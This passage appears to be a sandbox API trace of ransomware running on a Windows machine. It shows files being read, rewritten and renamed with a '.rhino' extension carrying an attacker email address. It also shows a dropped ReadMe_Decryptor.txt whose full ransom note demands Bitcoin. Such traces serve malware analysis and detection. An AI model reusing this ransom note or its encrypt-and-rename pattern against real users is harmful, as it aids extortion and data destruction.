Size=0xb0) returned 0x6e9ee8 [0107.454] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x712290 [0107.455] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x9b34, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.455] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.455] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.462] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.463] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x9a14, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x9a14, lpOverlapped=0x0) returned 1 [0107.463] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.464] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.464] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.465] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x9b34, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.465] CloseHandle (hObject=0x110) returned 1 [0107.465] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.465] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x712290 [0107.466] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x6115, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.466] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.466] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.467] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.468] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x5ff5, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x5ff5, lpOverlapped=0x0) returned 1 [0107.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.468] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.468] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.469] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x6115, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.469] CloseHandle (hObject=0x110) returned 1 [0107.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9ee8 [0107.469] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x106) returned 0x712290 [0107.470] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x14998, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.470] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.470] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.471] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.471] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x14878, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x14878, lpOverlapped=0x0) returned 1 [0107.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713830 [0107.472] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711d10 [0107.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0b10 [0107.472] GetLastError () returned 0x0 [0107.472] SetLastError (dwErrCode=0x0) [0107.472] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.472] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1489b) returned 0x23ff070 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0750 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x7148e0 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0750 | out: hHeap=0x6d0000) returned 1 [0107.473] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713830 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713820 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713830 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713820 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713830 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713820 | out: hHeap=0x6d0000) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757f58 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713830 | out: hHeap=0x6d0000) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757ef8 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757f58 | out: hHeap=0x6d0000) returned 1 [0107.473] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x7130e0 [0107.473] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ef8 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x7118c0 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7130e0 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711d10 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7118c0 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0b10 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711d10 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef848 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0b10 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x712898 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef848 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x712290 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712898 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x715160 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x712290 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715160 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x719718 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x7199e8 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x719e20 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7199e8 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x23b2088 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719e20 | out: hHeap=0x6d0000) returned 1 [0107.474] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x719718 [0107.474] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.475] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x23b2088 [0107.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.475] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x23b35c8 [0107.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.475] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x23b5590 [0107.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b35c8 | out: hHeap=0x6d0000) returned 1 [0107.475] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23f16b8 [0107.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b5590 | out: hHeap=0x6d0000) returned 1 [0107.475] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23b2088 [0107.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.475] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x2413918 [0107.475] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.476] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24c0050 [0107.593] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x2413918 | out: hHeap=0x6d0000) returned 1 [0107.623] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x24df090 [0107.624] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0107.626] WriteFile (in: hFile=0x110, lpBuffer=0x24df0a0*, nNumberOfBytesToWrite=0x14998, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24df0a0*, lpNumberOfBytesWritten=0x292f304*=0x14998, lpOverlapped=0x0) returned 1 [0107.627] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24df090 | out: hHeap=0x6d0000) returned 1 [0107.628] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x14998, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.628] CloseHandle (hObject=0x110) returned 1 [0107.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.630] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x712290 [0107.630] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.630] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\6d10pbgI59tZwQc.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\rw4ari0mpd\\6d10pbgi59tzwqc.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\6d10pbgI59tZwQc.pptx.[generalchin@countermail.com].rhino" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\rw4ari0mpd\\6d10pbgi59tzwqc.pptx.[generalchin@countermail.com].rhino"), dwFlags=0x2) returned 1 [0107.699] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.699] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7148e0 | out: hHeap=0x6d0000) returned 1 [0107.699] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23ff070 | out: hHeap=0x6d0000) returned 1 [0107.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7ad3d0 [0107.700] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712930 | out: hHeap=0x6d0000) returned 1 [0107.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x7af260 [0107.700] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x757a58 [0107.700] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af260 | out: hHeap=0x6d0000) returned 1 [0107.700] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\ReadMe_Decryptor.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\rw4ari0mpd\\readme_decryptor.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.700] lstrlenA (lpString="All your files have been encrypted due to a security problem with your PC. If you want to restore them, write us to the e-mail:\n1)generalchin@countermail.com\n2)generalchin@smime.ninja (if you do not receive a response from the first mailbox)\n\nYou have to pay for decryption in Bitcoins. The price depends on how fast you write to us.\nAfter payment we will send you the decryption tool that will decrypt all your files.\n\nFree decryption as guarantee\nBefore paying you can send us up to 1 files for free decryption.\nThe total size of files must be less than 500 Kb (non archived), and files should not contain valuable information. (databases,backups, large excel sheets, etc.)\n") returned 676 [0107.700] WriteFile (in: hFile=0x110, lpBuffer=0xcb9dd0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x292f35c, lpOverlapped=0x0 | out: lpBuffer=0xcb9dd0*, lpNumberOfBytesWritten=0x292f35c*=0x2a4, lpOverlapped=0x0) returned 1 [0107.702] CloseHandle (hObject=0x110) returned 1 [0107.702] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757a58 | out: hHeap=0x6d0000) returned 1 [0107.702] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\RW4ArI0Mpd\\WIvbClqSIjfcdCzevi.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\kjwgnxsb5p\\wgsarbbd\\rw4ari0mpd\\wivbclqsijfcdczevi.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0107.702] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x292f364 | out: lpFileSizeHigh=0x292f364*=0x0) returned 0x100e8 [0107.702] LockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10208, nNumberOfBytesToLockHigh=0x0) returned 1 [0107.702] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0xffffffe0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.702] ReadFile (in: hFile=0x110, lpBuffer=0x292f324, nNumberOfBytesToRead=0x20, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x292f324*, lpNumberOfBytesRead=0x292f304*=0x20, lpOverlapped=0x0) returned 1 [0107.703] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.704] ReadFile (in: hFile=0x110, lpBuffer=0x2b80040, nNumberOfBytesToRead=0x100e8, lpNumberOfBytesRead=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x2b80040*, lpNumberOfBytesRead=0x292f304*=0x100e8, lpOverlapped=0x0) returned 1 [0107.704] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713810 [0107.704] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713810 | out: hHeap=0x6d0000) returned 1 [0107.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c) returned 0x711ae0 [0107.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x40) returned 0x23b0960 [0107.705] GetLastError () returned 0x0 [0107.705] SetLastError (dwErrCode=0x0) [0107.705] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711ae0 | out: hHeap=0x6d0000) returned 1 [0107.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1010b) returned 0x23ff070 [0107.705] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0960 | out: hHeap=0x6d0000) returned 1 [0107.705] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x100) returned 0x6f0648 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x180) returned 0x712898 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6f0648 | out: hHeap=0x6d0000) returned 1 [0107.706] SetFilePointerEx (in: hFile=0x110, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1) returned 0x713810 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2) returned 0x713800 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713810 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3) returned 0x713810 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713800 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4) returned 0x713800 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713810 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6) returned 0x713810 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713800 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x9) returned 0x757ec8 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713810 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd) returned 0x757d90 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757ec8 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13) returned 0x713060 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757d90 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x23be6b8 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x713060 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2a) returned 0x711ae0 [0107.706] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23be6b8 | out: hHeap=0x6d0000) returned 1 [0107.706] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x3f) returned 0x23b0960 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x711ae0 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x5e) returned 0x6ef918 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b0960 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x8d) returned 0x7af260 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ef918 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd3) returned 0x757a58 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7af260 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x13c) returned 0x728cb8 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x757a58 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1da) returned 0x712290 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x728cb8 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2c7) returned 0x753e48 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x712290 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x42a) returned 0x720190 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x753e48 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x63f) returned 0x729740 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x720190 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x95e) returned 0x71d350 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x729740 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xe0d) returned 0x74c018 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x71d350 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1536) returned 0x719718 [0107.707] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x74c018 | out: hHeap=0x6d0000) returned 1 [0107.707] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1fbf) returned 0x703710 [0107.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x719718 | out: hHeap=0x6d0000) returned 1 [0107.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x2f8d) returned 0x715160 [0107.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x703710 | out: hHeap=0x6d0000) returned 1 [0107.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4742) returned 0x23b2088 [0107.708] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x715160 | out: hHeap=0x6d0000) returned 1 [0107.708] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x6ad1) returned 0x23f16b8 [0107.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23b2088 | out: hHeap=0x6d0000) returned 1 [0107.709] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa028) returned 0x240f188 [0107.709] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23f16b8 | out: hHeap=0x6d0000) returned 1 [0107.710] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xf02a) returned 0x24c0050 [0107.712] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x240f188 | out: hHeap=0x6d0000) returned 1 [0107.712] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1682d) returned 0x24cf088 [0107.713] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24c0050 | out: hHeap=0x6d0000) returned 1 [0107.713] WriteFile (in: hFile=0x110, lpBuffer=0x24cf0a0*, nNumberOfBytesToWrite=0x10208, lpNumberOfBytesWritten=0x292f304, lpOverlapped=0x0 | out: lpBuffer=0x24cf0a0*, lpNumberOfBytesWritten=0x292f304*=0x10208, lpOverlapped=0x0) returned 1 [0107.714] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x24cf088 | out: hHeap=0x6d0000) returned 1 [0107.714] UnlockFile (hFile=0x110, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x10208, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0107.714] CloseHandle (hObject=0x110) returned 1 [0107.716] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x23bc208 [0107.717] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x11e) returned 0x23bb7c8 [0107.717] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x23bc208 | out: hHeap=0x6d0000) returned 1 [0107.717] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS 